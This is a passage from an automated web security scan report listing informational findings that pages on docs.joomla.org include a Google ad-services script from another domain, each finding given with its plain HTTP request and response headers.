Last-Modified: Sat, 15 Jan 2011 14:51:46 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.144. http://docs.joomla.org/Category:Development

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Category:Development

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Category:Development HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Thu, 20 Jan 2011 17:16:15 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.145. http://docs.joomla.org/Category:FAQ

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Category:FAQ

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Category:FAQ HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Wed, 19 Jan 2011 19:00:24 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 52671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.146. http://docs.joomla.org/Category:Tips_and_tricks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Category:Tips_and_tricks

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Category:Tips_and_tricks HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sat, 08 Jan 2011 16:58:52 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.147. http://docs.joomla.org/Cookie_jar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Cookie_jar

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Cookie_jar HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sun, 13 Jun 2010 18:50:40 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.148. http://docs.joomla.org/Developer_Email_lists

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Developer_Email_lists

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Developer_Email_lists HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sun, 19 Sep 2010 12:36:45 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.149. http://docs.joomla.org/Developers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Developers

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Developers HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Thu, 20 Jan 2011 17:18:15 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.150. http://docs.joomla.org/Development_Working_Group

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Development_Working_Group

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Development_Working_Group HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sun, 19 Sep 2010 12:39:23 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.151. http://docs.joomla.org/Documentation_Working_Group

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Documentation_Working_Group

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Documentation_Working_Group HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Tue, 16 Nov 2010 07:15:56 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.152. http://docs.joomla.org/Evaluators

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Evaluators

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Evaluators HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Tue, 18 Jan 2011 16:27:54 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.153. http://docs.joomla.org/GHOP_students/James_William_Ramsay

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /GHOP_students/James_William_Ramsay

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /GHOP_students/James_William_Ramsay HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Content-language: en
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-Modified: Sun, 13 Jun 2010 18:50:40 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.154. http://docs.joomla.org/GHOP_students/Kevin_Hayne

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /GHOP_students/Kevin_Hayne

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /GHOP_students/Kevin_Hayne HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Content-language: en
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-Modified: Sat, 30 Oct 2010 01:55:13 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.155. http://docs.joomla.org/GHOP_students/Michael_Casha

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /GHOP_students/Michael_Casha

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /GHOP_students/Michael_Casha HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Content-language: en
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-Modified: Sun, 13 Jun 2010 18:50:40 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.156. http://docs.joomla.org/Help_screens

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Help_screens

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Help_screens HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sun, 19 Sep 2010 13:11:14 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.157. http://docs.joomla.org/Joomla!_Extension_Directory_FAQs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Joomla!_Extension_Directory_FAQs

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Joomla!_Extension_Directory_FAQs HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Mon, 20 Sep 2010 18:01:48 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.158. http://docs.joomla.org/Joomla_Administrators_Security_Checklist

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Joomla_Administrators_Security_Checklist

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Joomla_Administrators_Security_Checklist HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sun, 13 Jun 2010 18:50:40 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.159. http://docs.joomla.org/Migrating_from_1.0.x_to_1.5_Stable

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Migrating_from_1.0.x_to_1.5_Stable

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Migrating_from_1.0.x_to_1.5_Stable HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Tue, 18 Jan 2011 16:27:54 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.160. http://docs.joomla.org/Portal:Bug_Squad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Portal:Bug_Squad

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Portal:Bug_Squad HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Thu, 16 Sep 2010 21:13:17 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.161. http://docs.joomla.org/Start_here

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Start_here

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Start_here HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sun, 13 Jun 2010 18:50:40 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.162. http://docs.joomla.org/Template

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Template

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Template HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sat, 15 Jan 2011 15:04:37 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.163. http://docs.joomla.org/Tutorial:Creating_a_basic_Joomla!_template

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Tutorial:Creating_a_basic_Joomla!_template

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Tutorial:Creating_a_basic_Joomla!_template HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Content-language: en
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-Modified: Sun, 16 Jan 2011 13:42:39 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.164. http://docs.joomla.org/Upgrading_1.5_from_an_existing_1.5x_version

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Upgrading_1.5_from_an_existing_1.5x_version

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Upgrading_1.5_from_an_existing_1.5x_version HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
